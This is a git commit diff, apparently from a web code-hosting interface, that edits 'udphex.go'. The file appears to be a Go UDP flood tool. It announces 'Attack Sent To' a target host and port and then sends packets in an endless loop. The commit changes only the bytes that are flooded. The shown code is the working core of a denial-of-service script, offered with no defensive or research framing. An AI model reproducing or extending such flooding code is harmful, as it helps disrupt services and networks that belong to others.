Update udphex.go
This commit is contained in:
parent
a2e09b06db
commit
1d54bc962d
1 changed files with 1 additions and 1 deletions
|
@ -15,7 +15,7 @@ func main() {
|
||||||
} else {
|
} else {
|
||||||
fmt.Println("Attack Sent To " + target + ":" + port)
|
fmt.Println("Attack Sent To " + target + ":" + port)
|
||||||
for {
|
for {
|
||||||
conn.Write([]byte("\x61\x73\x64"))
|
conn.Write([]byte("\x31"))
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
Loading…
Add table
Reference in a new issue